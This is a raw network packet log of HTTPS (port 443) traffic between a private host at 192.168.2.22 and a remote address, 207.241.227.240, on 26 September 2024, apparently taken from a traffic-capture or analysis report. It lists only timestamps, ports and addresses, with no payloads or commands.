Sep 26, 2024 10:33:09.894378901 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:09.894435883 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:09.916973114 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:09.917033911 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:09.917045116 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:09.917072058 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:09.917099953 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:09.918071985 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:09.918138981 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:09.918152094 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:09.918179035 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:09.918209076 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:09.918289900 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:09.919380903 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:09.919456005 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:09.919470072 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:09.919521093 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:09.920551062 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:09.920617104 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:09.920618057 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:09.920643091 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:09.920675993 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:09.920722008 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:09.922147989 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:09.922203064 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:09.922218084 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:09.922266960 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:09.922277927 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:09.938724041 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:09.938792944 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:09.938796997 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:09.938822031 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:09.938846111 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:09.938860893 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:09.983493090 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:09.983521938 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:09.983654976 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:09.983654976 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:09.983654976 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:09.983692884 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:09.984095097 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:09.984129906 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:09.984155893 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:09.984168053 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:09.984185934 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:09.984198093 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.005904913 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.005971909 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.006058931 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.006058931 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.006093979 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.006714106 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.006778955 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.006786108 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.006813049 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.006845951 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.007461071 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.007517099 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.007535934 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.007554054 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.007606983 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.007616997 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.007925034 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.007981062 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.007996082 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.008021116 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.008055925 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.009047031 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.009099960 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.009130001 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.009179115 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.027906895 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.027975082 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.028075933 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.028075933 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.028110027 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.072211981 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.072243929 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.072273970 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.072309971 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.072328091 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.072328091 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.094769001 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.094831944 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.094835043 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.094877005 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.094893932 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.095490932 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.095558882 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.095563889 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.095606089 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.095624924 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.096555948 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.096609116 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.096621990 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.096688032 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.096740961 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.096751928 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.097357988 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.097414970 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.097425938 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.097453117 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.097485065 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.097565889 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.097615004 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.097624063 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.097642899 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.097697020 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.097704887 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.097723961 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.099854946 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.099912882 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.099926949 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.099965096 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.099994898 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.138437986 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.138506889 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.138515949 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.138540983 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.138577938 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.161211014 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.161283016 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.161298037 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.161322117 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.161358118 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.182884932 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.182915926 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.182951927 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.182975054 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.182990074 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.183059931 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.183530092 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.183557987 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.183578968 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.183588028 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.183603048 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.183718920 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.184528112 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.184556961 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.184592009 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.184600115 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.184614897 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.184688091 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.185503960 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.185534000 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.185559034 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.185566902 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.185592890 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.186389923 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.186444998 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.186454058 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.186547041 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.186599016 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.186621904 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.186647892 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.186681032 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.186712980 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.186750889 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.186758041 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.186845064 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.227479935 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.227554083 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.227560043 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.227583885 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.227615118 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.251420975 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.251482964 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.251494884 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.251522064 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.251576900 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.251585007 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.271836996 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.271862984 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.271905899 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.271905899 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.271919966 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.271935940 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.272697926 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.272731066 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.272751093 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.272759914 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.272773981 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.273408890 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.273437977 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.273461103 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.273469925 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.273483038 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.274367094 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.274415970 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.274420023 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.274435043 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.274482965 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.274518967 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.274550915 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.274569035 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.274576902 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.274593115 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.274666071 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.275365114 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.275408030 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.275439978 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.275450945 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.275463104 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.316201925 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.316262960 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.316276073 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.316301107 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.316344976 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.340363979 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.340426922 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.340430975 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.340460062 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.340473890 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.340487003 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.360863924 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.360934019 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.360996962 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.360996962 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.361031055 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.361605883 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.361668110 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.361777067 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.361778021 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.361812115 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.362314939 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.362376928 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.362384081 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.362410069 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.362442017 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.363181114 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.363220930 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.363238096 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.363265991 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.363285065 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.363930941 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.363965988 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.363987923 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.363996983 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.364012003 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.364464998 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.364494085 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.364514112 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.364521980 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.364537001 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.405002117 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.405072927 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.405195951 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.405195951 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.405231953 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.434964895 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.435028076 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.435091972 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.435091972 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.435125113 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.449429035 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.449521065 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.449637890 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.449637890 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.449671030 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.450376987 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.450434923 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.450438976 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.450476885 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.450500965 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.450937986 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.450995922 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.451006889 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.451031923 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.451066017 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.451584101 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.451641083 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.451649904 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.451673985 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.451709032 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.452186108 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.452256918 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.452267885 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.452294111 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.452327967 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.453022957 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.453079939 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.453088045 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.453111887 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.453149080 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.494411945 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.494478941 CEST | 49162 | 443 | 192.168.2.22 | 207.241.227.240
Sep 26, 2024 10:33:10.494493008 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
Sep 26, 2024 10:33:10.494518042 CEST | 443 | 49162 | 207.241.227.240 | 192.168.2.22
